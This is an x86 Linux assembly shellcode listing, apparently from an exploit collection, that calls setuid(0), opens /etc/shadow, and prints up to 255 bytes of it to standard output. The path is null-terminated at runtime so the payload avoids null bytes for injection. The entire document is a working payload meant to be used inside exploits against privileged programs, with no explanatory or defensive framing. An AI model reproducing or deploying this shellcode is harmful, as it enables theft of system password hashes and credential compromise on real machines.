[SC] print_shadow.s : 2006-11-21
.globl main
main:
#setuid
xorl %eax, %eax
mov $0x46, %al
xorl %ebx, %ebx
xorl %ecx, %ecx
int $0x80
jmp ONE
TWO:
#open
popl %ebx
xorl %eax, %eax
mov %al, 11(%ebx)
mov $0x5, %al
xorl %ecx, %ecx
int $0x80
#read
xorl %edx, %edx
mov $0xff, %dl
mov %esp, %ecx
mov %eax, %ebx
mov $0x3, %al
int $0x80
#write
mov $0x4, %al
mov $0x1, %bl
int $0x80
#exit
mov $0x1, %al
xorl %ebx, %ebx
int $0x80
ONE:
call TWO
.string "/etc/shadowX"
Copyleft (C) 2007 Len. All Rights Not Reserved.
Note of Exploiting